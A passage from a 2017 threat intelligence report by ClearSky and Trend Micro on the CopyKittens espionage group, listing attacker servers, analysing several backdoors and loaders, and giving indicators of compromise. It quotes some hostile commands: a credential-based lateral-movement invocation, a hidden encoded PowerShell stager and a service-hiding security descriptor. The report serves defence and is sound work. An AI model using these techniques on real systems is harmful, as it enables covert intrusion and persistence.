AS57043
146.0.73.112
Cobalt Strike
Netherlands
Hostkey B.v.
AS57043
146.0.73.114
Cobalt Strike
Netherlands
Hostkey B.v.
AS57043
144.168.45.126
BEEF SSL Server
United States
Incero LLC
AS54540
217.12.201.240
Cobalt Strike
Netherlands
ITL Company
AS21100
217.12.218.242
Cobalt Strike
Netherlands
ITL Company
AS21100
5.34.180.252
Cobalt Strike
Netherlands
ITL Company
AS21100
5.34.181.13
Cobalt Strike
Netherlands
ITL Company
AS21100
188.120.224.198
Cobalt Strike
Russian Federation
JSC ISPsystem
AS29182
188.120.228.172
Russian Federation
JSC ISPsystem
AS29182
188.120.242.93
Cobalt Strike
Russian Federation
JSC ISPsystem
AS29182
188.120.243.11
Russian Federation
JSC ISPsystem
AS29182
188.120.247.151
TDTESS
Russian Federation
JSC ISPsystem
AS29182
62.109.2.52
Cobalt Strike
Russian Federation
JSC ISPsystem
AS29182
188.120.232.157
Cobalt Strike
Russian Federation
JSC ISPsystem
AS29182
185.118.65.230
Russian Federation
LLC CloudSol
AS59504
185.118.66.114
Russian Federation
LLC CloudSol
AS59504
141.105.67.58
Metasploit and web hacking
Russian Federation
Mir Telematiki Ltd
AS49335
141.105.68.25
Cobalt Strike
Russian Federation
Mir Telematiki Ltd
AS49335
141.105.68.26
Metasploit and web hacking
Russian Federation
Mir Telematiki Ltd
AS49335
141.105.68.29
Metasploit and web hacking
Russian Federation
Mir Telematiki Ltd
AS49335
141.105.69.69
Cobalt Strike
Russian Federation
Mir Telematiki Ltd
AS49335
141.105.69.70
matreyoshka
Russian Federation
Mir Telematiki Ltd
AS49335
141.105.69.77
Metasploit and web hacking
Russian Federation
Mir Telematiki Ltd
AS49335
Some have been reported in our previous public reports
Page 24 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Country
AS name
31.192.105.16
Cobalt Strike
Russian Federation
Mir Telematiki Ltd
AS49335
31.192.105.17
Metasploit and web hacking
Russian Federation
Mir Telematiki Ltd
AS49335
31.192.105.28
Cobalt Strike
Russian Federation
Mir Telematiki Ltd
AS49335
158.69.150.163
Cobalt Strike
Canada
OVH SAS
AS16276
176.31.18.29
Cobalt Strike
France
OVH SAS
AS16276
188.165.69.39
Cobalt Strike
France
OVH SAS
AS16276
192.99.242.212
Cobalt Strike
Canada
OVH SAS
AS16276
198.50.214.62
Cobalt Strike
Canada
OVH SAS
AS16276
51.254.76.54
Cobalt Strike
France
OVH SAS
AS16276
198.55.107.164
United States
QuadraNet Inc
AS8100
104.200.128.126
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.161
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.173
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.183
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.184
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.185
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.187
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.195
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.196
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.198
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.205
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.206
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.208
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.209
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.48
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.58
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.64
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
104.200.128.71
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.160.138
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.160.178
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.160.194
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.160.195
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.161.141
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.174.21
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.174.228
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.174.232
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
107.181.174.241
Cobalt Strike
United States
Total Server Solutions L.L.C.
AS46562
86.105.18.5
Cobalt Strike
Netherlands
WorldStream B.V.
AS49981
93.190.138.137
Netherlands
WorldStream B.V.
AS49981
212.199.61.51
Cobalt Strike
Israel
012 Smile Communications LTD.
AS9116
80.179.42.37
Israel
012 Smile Communications LTD.
AS9116
80.179.42.44
Israel
012 Smile Communications LTD.
AS9116
Page 25 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Recently the attackers implemented self-signed certificates in some of the severs they manage, impersonating
Microsoft and Google.37
Self-signed digital certificate impersonating Microsoft as captured by censys.io
https://censys.io/certificates/f4aaac7d6aafc426d1adbe3b845a26c4110f7c9e54145444a8668718b84cbdb0
Page 26 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Malware
In this chapter we analyze and review malware used by CopyKittens.
TDTESS Backdoor
TDTESS (22fd59c534b9b8f5cd69e967cc51de098627b582) is 64-bit .NET binary backdoor that provides a
reverse shell with an option to download and execute files. It routinely calls in to the command and control
server for new instructions using basic authentication. Commands are sent via a web page. The malware
creates a stealth service, which will not show on the service manager or other tools that enumerate services
from WINAPI or Windows Management Instrumentation.
Installation and removal
TDTESS can run as either an interactive or non-interactive (service) program. When called interactively, it
receives one of the two arguments: installtheservice to install itself or uninstalltheservice to remove itself. The
arguments are described below:
installtheservice
If running with administrator privileges, it will install a service with the following characteristics:
Key name: bmwappushservice
Display name: bmwappushsvc
Description: WAP Push Message Routing Service
Type: own (runs in its own process)
Start type: auto (starts each time the computer is restarted and runs even if no one logs on to the
computer)
Path: (In our analysis: c:\Users\PC008\Desktop\t.exe)
Security descriptor:
D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLC
SWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;F
A;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Service information from command-line using sc tool
The hardcoded security descriptor used to create the service is a persistence technique. Interactive users, even
if they are administrators, cannot stop or even see the service in services.msc snap-in.
Page 27 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Following is a list of denied commands:
service_change_config
service_query_status
service_stop
service_pause_continue
delete
Service information in Registry
Two log files are created during the service installation, but deleted by the program. Following is their
recovered content:
InstallUtil.InstallLog
.t.InstallLog
After creating the service, it will update the file creation time to that of the following file:
%windir%\system32\svchost.exe
Page 28 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
uninstalltheservice
If running with administrator privileges, it will uninstall the said service, create log files and then deletes them.
InstallUtil.InstallLog
.t.InstallLog
Because the service installing mechanism appears to be default for .NET programs, the creator of the tool
deletes the log files right after they are created.
If no argument is given when called interactively, the program terminates itself.
Functionality
The service is started immediately after installation. After five minutes, it verifies internet connectivity by
making a HTTP HEAD request to microsoft.com.
Then it tries to access the C&C servers looking for commands.
Hardcoded HTTP parameters and URL
Page 29 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
As a reply, TDTESS expects one of the following Bas64 encoded commands:
getnrun - download and execute a file. Parameters are drop, drop_path and t.
runnreport - send information about the computer. Parameters are cmd and boss.
wait - time to next interval to get data.
Getnrun command and parameters
Indicators of Compromise
File name:
tdtess.exe
md5:
113ca319e85778b62145019359380a08
Services:
bmwappushservice
Registry Keys:
HKLM\System\CurrentControlSet\Services\bmwappushservice
URLs:
http://is-cdn.edge.g18.dyn.usr-e12-as.akamaitechnology[.]com/deploy/assets/css/main/style.min.css
http://a17-h16.g11.iad17.as.pht-external.c15.qoldenlines[.]net/deploy/assets/css/main/style.min.css
HTTP artifacts:
"User-Agent : XXXXXXXXXXXXXXXXX/5.0 (Windows NT 6.1 WOW64; Trident/7.0; AS; rv:11.0) like Gecko"
"Proxy-Authorization : Basic [Data]"
[Data] Will contain the TDTESS encrypted data to send
Page 30 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Vminst for Lateral Movement
Vminst (a60a32f21ac1a2ec33135a650aa8dc71) is a lateral movement tool used to infect hosts in the network
using previously stolen credentials. It Injects Cobalt Strike into memory of infected hosts.
The binary implements ServiceMain and is intended to be installed as a service named
sdrsrv.
When it
functions as a service, it injects Cobalt Strike beacon into its own process (which is 32-bit
svchost
) or creates
a new 32-bit
rundll32
process and injects the beacon into the new process. The injection method depends
on the parameter received when the service was created.
It is configured to open a new
rundll32
process in suspend-mode and create a remote thread which executes
a Cobalt Strike beacon or shellcode.
The binary has the option to run and load itself in memory. It also has the option to be executed through its
exported function "v," which gets a base64 string parameter built as follows:
Base-64-Encode(
/mv /OptionalCommand
OptionalCommand can be one of the following:
help - prints usage instructions:
[*] /help V160\n
Get : Create Service and run beacon over self thread\n
[*] /get ip (use current token)\n
[*] /get ip domain user pass\n
[*] /get ip user pass\n
New : Create Service and run beacon over new rundll32.exe thread\n
[*] /new ip (use current token)\n
[*] /new ip domain user pass\n
[*] /new ip user pass\n
[*] /new ip user pass\n
Del : Delete service and related dlls from remote host
[*] /del ip domain user pass\n
[*] /del ip user pass\n
[*] /del ip\n
Run : Run a new beacon !\n
[*] /run [no arguments]
del - stops and deletes the service
sdrsrv,
and deletes the following files:
\\ [IP or computer name (Can be Localhost)]\C$\Users\public\vminst.tmp
\\ [IP or computer name (Can be Localhost)]\C$\Windows\Temp\vminst.tmp
\\ [IP or computer name (Can be Localhost)]\C$\Windows\vminst.tmp
scan - sends
[ok]
to the parent of its parent process.
info - sends
[ok]
to the parent of its parent process.
run - injects a beacon into a new
rundll32
process.
get - gets an IP address, installs and starts the
sdrsrv
service in the remote hosts.
new - gets IP address, deletes the old vminst from install path, and installs the
sdrsrv
service in the
remote hosts. Then, starts the service with parameter
NEW_THREAD
that runs the service. This
command is likely used for updating the implant.
The attacker uses vminst.tmp to spread across the organization. Using the command
rundll32 vminst.tmp,v
/mv /get ip-segment credentials
it enumerates the segments and tries to connect to the hosts through SMB
GetFileAttributes
to network path), installing the
sdrsrv
service in each host it can access.
Page 31 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Indicators of Compromise
File name:
vminst.tmp
md5:
A60A32F21AC1A2EC33135A650AA8DC71
Services:
sdrsrv
Registry Keys:
HKLM\System\CurrentControlSet\Services\sdrsrv
Path:
\\ [IP or computer name (Can be Localhost)]\C$\Users\public\[File]
\\ [IP or computer name (Can be Localhost)]\C$\Windows\Temp\[File]
\\ [IP or computer name (Can be Localhost)]\C$\Windows\[File]
File, one of:
vminst.tmp - The malware
l.tmp - Log file from last V command
NetSrv
Cobalt Strike Loader
NetSrv (efca6664ad6d29d2df5aaecf99024892) loads Cobalt Strike beacons and shellcodes in infected
computers.
The binary implements ServiceMain, intended to be installed as a service named
netsrv.
When it functions
as a service, it is configured to open a new
rundll32
process in suspend-mode and create a remote thread
that executes a Cobalt Strike beacon or shellcode.
The binary also has the option to be executed with parameters that determine what it will inject into the
rundll32
process. The command-line is as follows:
netsrv.exe /managed /ModuleToInject
The ModuleToInject can be one of these options:
sbdns
slbdnsk1
slbdnsn1
slbsbmn1
slbsmbk1
Each of these options injects a Cobalt Strike beacon or shellcode into the
rundll32
process.
Indicators of Compromise
File names:
netsrv.exe
netsrva.exe
netsrvd.exe
netsrvs.exe
Services:
netsrv
netsrvs
netsrvd
Registry Keys:
HKLM\System\CurrentControlSet\Services\netsrv
HKLM\System\CurrentControlSet\Services\netsrvs
Page 32 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
HKLM\System\CurrentControlSet\Services\netsrvd
Matryoshka v1
RAT
Matryoshka v1 is a RAT analyzed in the 2015 report by ClearSky and Minerva.38 It uses DNS for command and
control communication, and has common RAT capabilities such as stealing Outlook passwords, screen
grabbing, keylogging, collecting and uploading files, and giving the attacker Meterpreter shell access. We have
seen this version of Matreyoshka in the wild from July 2016 until January 2017.
The Matryoshka.Reflective_Loader injects the module Matryoshka.Rat, which has the same persistence keys
and communication method described in the original report.
Indicators of Compromise
File name
Kernel.dll
win.dll
update5x.dll
22092014_ver621.dll
94ba33696cd6ffd6335948a752ec9c19
d9aa197ca2f01a66df248c7a8b582c40
506415ef517b4b1f7679b3664ad399e1
1ca03f92f71d5ecb5dbf71b14d48495c
Command and control
cloudflare-statics[.]com
cloudflare-analyse[.]com
mswordupdate17[.]com
Registry Keys:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\{0355F5D0-467C-30E9-894CC2FAEF522A13}
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{0355F5D0-467C-30E9-894C-C2FAEF522A13}
Scheduled Tasks:
\Windows\Microsoft Boost Kernel Optimization
Windows Boost Kernel
Matreyoshka v2
RAT
Matryoshka v2 (bd38cab32b3b8b64e5d5d3df36f7c55a) is mostly like Matreyoshka v1 but has fewer
commands and a few other minor changes. Upon starting it will inject the communication module
to all available processes (with the same run architecture and the same or lower level of permission).
The inner name of Svchost
s is Injector.dll. The next stage, in memory, is ReflectiveDLL.dll. The ReflectiveDLL.dll
provides persistence via a schedule task and checks that the stager, Injector.dll, exist on disk.
ReflectiveDLL.dll gets commands via the following DNS resolutions:
Command
Resolved IP
Functionality
Send full info 104.40.211.100 Send host information
Beacon
MessageBox
104.40.211.11
104.40.211.12
Get UID
104.40.211.13
Inject Cobalt Strike beacon
Pop MessageBox with simple note (Only if injected into process with user
interface)
Send UID
Exit
104.40.211.14
Exit the process the thread was injected into
OK_StopParse 161.69.29.251
keep-alive or end chain of commands
www.clearskysec.com/report-the-copykittens-are-targeting-israelis/
Page 33 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Indicators of Compromise
File names:
Svchost32.swp
Svchost64.swp
Md5:
bd38cab32b3b8b64e5d5d3df36f7c55a
Folder path:
[windrive]\Users\public\
[windrive]\Windows\temp\
[windrive]\Windows\tmp\
Files:
LogManager.tmp
edg1CF5.tmp (malware backup copy)
ntuser.swp (malware backup copy)
svchost64.swp(malware main file)
ntuser.dat.swp (log file)
455aa96e-804g-4bcf-bcf8-f400b3a9cfe9.PackageExtraction (folder)
_%d.klg (keylog file, random integer)
_%d.sc (screen capture file, random integer)
Command and control:
winupdate64[.]com
Services:
sdrsrv
Class from CPP RTTI:
PSCL_CLASS_JOB_SAVE_CONFIG
PSCL_CLASS_BASE_JOB
Page 34 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
ZPP
File Compressor
ZPP (bcae706c00e07936fc41ac47d671fc40) is a .NET console program that compresses files with the ZIP
algorithm. It can transfer compressed files to a remote network share.
Command line options are as follows:
-I - File extension to compress (i.e.: .txt)
-s - Source directory
-d - Destination directory
-gt - Greater than creation timestamp
-lt - Lower than creation timestamp
-mb - Unimplemented
-o - Output file name
-e - File extension to skip (except)
ZPP will recursively read all files in the source directory to compress them with the maximum compression
rate if their names match the extension pattern given (-i). The compressed ZIP file is written to the output
directory (-d). If no output file name is set, ZPP will use the mask zpp.out. .
For example:
Filename is zpp5077.out0
The file compilation timestamp is Tue, 05 Jul 2016 17:22:59 UTC.
ad09feb76709b825569d9c263dfdaaac is a previous version (compilation timestamp: Sat, 09 Jan 2016 17:02:38
UTC) and is only different in that it accepts the
e switch, which ignored by the program logic.
214be584ff88fb9c44676c1d3afd7c95 is the newest version (compilation timestamp: Mon, 26 Sep 2016
19:49:34 UTC). It is supposed to implement the
s switch but although it is set when the user gives it to the
program, the switch is ignored by the code.
ZPP version 2.0
ZPP seems to be under development. All versions have bugs.
It uses the reduced version of DotNetZip library. 39 Therefore, it requires Ionic.Zip.Reduced.dll
(7c359500407dd393a276010ab778d5af) to be under the same directory or %PATH%.
Function doCompressInNetWorkDirectory() is intended to exfiltrate date from a target machine to a network
share.
https://dotnetzip.codeplex.com
Page 35 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
ZPP doCompressInNetWorkDirectory() function
Passing it a network location will result in the compressed files being dropped in it:
Passing a network location to ZPP
Indicators of Compromise
File name:
zpp.exe
md5:
bcae706c00e07936fc41ac47d671fc40
ad09feb76709b825569d9c263dfdaaac
214be584ff88fb9c44676c1d3afd7c95
Cobalt Strike
Cobalt Strike is a publicly available commercial software for "Adversary Simulations and Red Team
Operations."40 While not malicious in and of itself, it is often used by cybercrime groups and state-sponsored
threat groups, due to its post-exploitation and covert communication capabilities. 41 4243 44
CopyKittens use the free 21-day trial version of Cobalt Strike. Thus, malicious communication generated by
the tool is much easier to detect, because a special header is sent in each HTTP GET transaction. The special
header is "X-Malware," i.e. there is a literal indication that "this network communication is malicious." All that
https://www.cobaltstrike.com
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-theoceanlotus-group/
http://www.antiy.net/wp-content/uploads/ANALYSIS-ON-APT-TO-BE-ATTACK-THAT-FOCUSING-ONCHINAS-GOVERNMENT-AGENCY-.pdf
Page 36 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
defender need to do to detect infections is to look for this header in network traffic. Other "tells" are
implemented in the trail version.45
CopyKittens often use Cobalt Strike's DNS based command and control capability.46 Other capabilities include
PowerShell scripts execution, keystrokes logging, taking screenshots, file downloads, spawning other payloads,
and peer-to-peer communication over the SMB.
Persistency
The attackers used a novel way for persistency of Cobalt Strike samples in certain machine
a scheduled task
was written directly to the registry.
The malware creates a PowerShell wrapper, which executes powershell.exe to run scripts. The wrapper is
copied to %windir% with one of the following names:
svchost.exe
csrss.exe
notpad.exe (note missing e)
conhost.exe
The scheduled tasks are saved in the following registry path:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks
With the following attributes:
"Path"="\\Microsoft\\Windows\\Media Center\\ConfigureLocalTimeService"
"Description"="Media Center Time Update From Computer Local Time."
"Actions"=hex:01,00,66,66,00,00,00,00,2c,00,00,00,43,00,3a,00,5c,00,57,00,69,\
00,6e,00,64,00,6f,00,77,00,73,00,5c,00,73,00,76,00,63,00,68,00,6f,00,73,00,\
74,00,2e,00,65,00,78,00,65,00,7e,31,00,00,2d,00,6e,00,6f,00,70,00,20,00,2d,\
00,77,00,20,00,68,00,69,00,64,00,64,00,65,00,6e,00,20,00,2d,00,65,00,6e,00,\
63,00,6f,00,64,00,65,00,64,00,63,00,6f,00,6d,00,6d,00,61,00,6e,00,64,00,20,\
00,4a,00,41,00,42,00,7a,00,41,00,44,00,30,00,41,00,54,00,67,00,42,00,6c,00,\
The hex code in the Actions attribute is converted into the following command line action:
C:\Windows\svchost.exe -nop -w hidden -encodedcommand JABzAD0ATgBl[
The executed command is a base64 encoded PowerShell cobalt strike stager.
The task does not have a name attribute and it does not appear in windows scheduled task viewers. The
installation methods of this persistency method is unknown to us.
Metasploit
A well-known free and open source framework for developing and executing exploit code against a remote
target machine.47 It has more than 1,610 exploits, as well as more than 438 payloads, which include command
shell that enables users to run collection scripts or arbitrary commands against the host. Meterpreter, which
enables users to control the screen of a device using VNC and to browse, upload and download files. It also
employs dynamic payloads that enables users to evade antivirus defenses by generating unique payloads.48
https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/
https://www.cobaltstrike.com/help-dns-beacon
https://www.metasploit.com
https://en.wikipedia.org/wiki/Metasploit_Project
Page 37 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Empire Post-exploitation Framework
In several occasions the attackers used Empire, a free and open source "post-exploitation framework that
includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.49 The framework
offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire
implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable postexploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network
detection, all wrapped up in a usability-focused framework."
https://github.com/EmpireProject/Empire
Page 38 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Indicators of Compromise
Detection name
Detection name
Detection name
Detection name
Detection name
Detection name
Detection name
Detection name
Detection name
SSLCertificate
SSLCertificate
SSLCertificate
SSLCertificate
SSLCertificate
SSLCertificate
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
BKDR_COBEACON.A
TROJ_POWPICK.A
HKTL_PASSDUMP
TROJ_SODREVR.A
TROJ_POWSHELL.C
BKDR_CONBEA.A
TSPY64_REKOTIB.A
HKTL_DIRZIP
TROJ_WAPPOME.A
http://js[.]jguery[.]net/main[.]js
http://pht[.]is[.]nlb-deploy[.]edge-dyn[.]e11[.]f20[.]ads-youtube[.]online/winini[.]exe
http://38[.]130[.]75[.]20/check[.]html
http://update[.]microsoft-office[.]solutions/license[.]doc
http://update[.]microsoft-office[.]solutions/error[.]html
http://main[.]windowskernel14[.]com/spl/update5x[.]zip
http://img[.]twiterstatics[.]info/i/658A6D6AE42A658A6D6AE42A/0de9c5c6599fdf5201599ff9b30e0000/6E24E58CF
C94/icon[.]png
http://files0[.]terendmicro[.]com/
http://ssl[.]pmo[.]gov[.]il-dana-naauthurl1-welcome[.]cgi[.]primeminister-govermenttechcenter[.]tech/%D7%A1%D7%A7%D7%A8%20%D7%A9%D7%A0%D7%AA%D7%99[.]docx
http://ea-in-f155[.]1e100[.]microsoft-security[.]host/
https://ea-in-f155[.]1e100[.]microsoft-security[.]host/mTQJ
http://iba[.]stage[.]7338879[.]i[.]gtld-servers[.]services
http://doa[.]stage[.]7338879[.]i[.]gtld-servers[.]services
http://fda[.]stage[.]7338879[.]i[.]gtld-servers[.]services
http://rqa[.]stage[.]7338879[.]i[.]gtld-servers[.]services
http://qqa[.]stage[.]7338879[.]i[.]gtld-servers[.]services
http://api[.]02ac36110[.]49318[.]a[.]gtld-servers[.]zone
s1w-amazonaws.office-msupdate[.]solutions
a104-93-82-25.mandalasanati[.]info/iBpa
http://fetchnews-agency[.]news-bbc.press/pictures.html
http://fetchnews-agency.news-bbc.press/omnews.doc
http://fetchnews-agency[.]news-bbc.press/en/20170/pictures.doc
fa3d5d670dc1d153b999c3aec7b1d815cc33c4dc
b11aa089879cd7d4503285fa8623ec237a317aee
07317545c8d6fc9beedd3dd695ba79dd3818b941
3c0ecb46d65dd57c33df5f6547f8fffb3e15722d
1c43ed17acc07680924f2ec476d281c8c5fd6b4a
8968f439ef26f3fcded4387a67ea5f56ce24a003
206.221.181.253
66.55.152.164
68.232.180.122
173.244.173.11
173.244.173.12
173.244.173.13
209.190.20.149
209.190.20.59
209.190.20.62
209.51.199.116
38.130.75.20
Page 39 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
185.92.73.194
144.168.45.126
198.55.107.164
104.200.128.126
104.200.128.161
104.200.128.173
104.200.128.183
104.200.128.184
104.200.128.185
104.200.128.187
104.200.128.195
104.200.128.196
104.200.128.198
104.200.128.205
104.200.128.206
104.200.128.208
104.200.128.209
104.200.128.48
104.200.128.58
104.200.128.64
104.200.128.71
107.181.160.138
107.181.160.178
107.181.160.194
107.181.160.195
107.181.161.141
107.181.174.21
107.181.174.228
107.181.174.232
107.181.174.241
188.120.224.198
188.120.228.172
188.120.242.93
188.120.243.11
188.120.247.151
62.109.2.52
188.120.232.157
185.118.65.230
185.118.66.114
141.105.67.58
141.105.68.25
141.105.68.26
141.105.68.29
141.105.69.69
141.105.69.70
141.105.69.77
31.192.105.16
31.192.105.17
31.192.105.28
146.0.73.109
146.0.73.110
146.0.73.111
146.0.73.112
146.0.73.114
Page 40 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
IPv4Address
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
217.12.201.240
217.12.218.242
5.34.180.252
5.34.181.13
86.105.18.5
93.190.138.137
212.199.61.51
80.179.42.37
80.179.42.44
176.31.18.29
188.165.69.39
51.254.76.54
158.69.150.163
192.99.242.212
198.50.214.62
a60a32f21ac1a2ec33135a650aa8dc71
94ba33696cd6ffd6335948a752ec9c19
bcae706c00e07936fc41ac47d671fc40
1ca03f92f71d5ecb5dbf71b14d48495c
506415ef517b4b1f7679b3664ad399e1
1ca03f92f71d5ecb5dbf71b14d48495c
bd38cab32b3b8b64e5d5d3df36f7c55a
ac29659dc10b2811372c83675ff57d23
41466bbb49dd35f9aa3002e546da65eb
8f6f7416cfdf8d500d6c3dcb33c4f4c9e1cd33998c957fea77fbd50471faec88
02f2c896287bc6a71275e8ebe311630557800081862a56a3c22c143f2f3142bd
2df6fe9812796605d4696773c91ad84c4c315df7df9cf78bee5864822b1074c9
55f513d0d8e1fd41b1417a0eb2afff3a039a9529571196dd7882d1251ab1f9bc
da529e0b81625828d52cd70efba50794
1f9910cafe0e5f39887b2d5ab4df0d10
0feb0b50b99f0b303a5081ffb3c4446d
577577d6df1833629bfd0d612e3dbb05
165f8db9c6e2ca79260b159b4618a496e1ed6730d800798d51d38f07b3653952
1f867be812087722010f12028beeaf376043e5d7
b571c8e0e3768a12794eaf0ce24e6697
e319f3fb40957a5ff13695306dd9de25
acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a
8c8496390c3ad048f2a0a4031edfcdac819ee840d32951b9a1a9337a2dcbea25
c5a02e984ca3d5ac13cf946d2ba68364
efca6664ad6d29d2df5aaecf99024892
bff115d5fb4fd8a395d158fb18175d1d183c8869d54624c706ee48a1180b2361
afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77
4a3d93c0a74aaabeb801593741587a02
64c9acc611ef47486ea756aca8e1b3b7
fb775e900872e01f65e606b722719594
cf8502b8b67d11fbb0c75ebcf741db15
4999967c94a2fb1fa8122f1eea7a0e02
5fe0e156a308b48fb2f9577ed3e3b09768976fdd99f6b2d2db5658b138676902
37449ddfc120c08e0c0d41561db79e8cbbb97238
4442c48dd314a04ba4df046dfe43c9ea1d229ef8814e4d3195afa9624682d763
7651f0d886e1c1054eb716352468ec6aedab06ed61e1eebd02bca4efbb974fb6
eb01202563dc0a1a3b39852ccda012acfe0b6f4d
7e3c9323be2898d92666df33eb6e73a46c28e8e34630a2bd1db96aeb39586aeb
9e5ab438deb327e26266c27891b3573c302113b8d239abc7f9aaa7eff9c4f7bb
Page 41 of 48
All rights reserved to ClearSky cyber security and Trend Micro, 2017
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Hash
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
Filename
6a19624d80a54c4931490562b94775b74724f200
32860b0184676509241bbaf9233068d472472c3d9c93570fc072e1acea97a1d4
b34721e53599286a1093c90a9dd0b789
7ad65e39b79ad56c02a90dfab8090392ec5ffed10a8e276b86ec9b1f2524ad31
59c448abaa6cd20ce7af33d6c0ae27e4a853d2bd
fb775e900872e01f65e606b722719594
871efc9ecd8a446a7aa06351604a9bf4
cf8502b8b67d11fbb0c75ebcf741db15
a4dd1c225292014e65edb83f2684f2d5
838fb8d181d52e9b9d212b49f4350739
e37418ba399a095066845e7829267efe
1072b82f53fdd9fa944685c7e498eece89b6b4240073f654495ac76e303e65c9
752240cddda5acb5e8d026cef82e2b54
435a93978fa50f55a64c788002da58a5
3de91d07ac762b193d5b67dd5138381a
a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37
aba7771c42aea8048e4067809c786b0105e9dfaa
b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d3815dd
3676914af9fd575deb9901a8b625f032
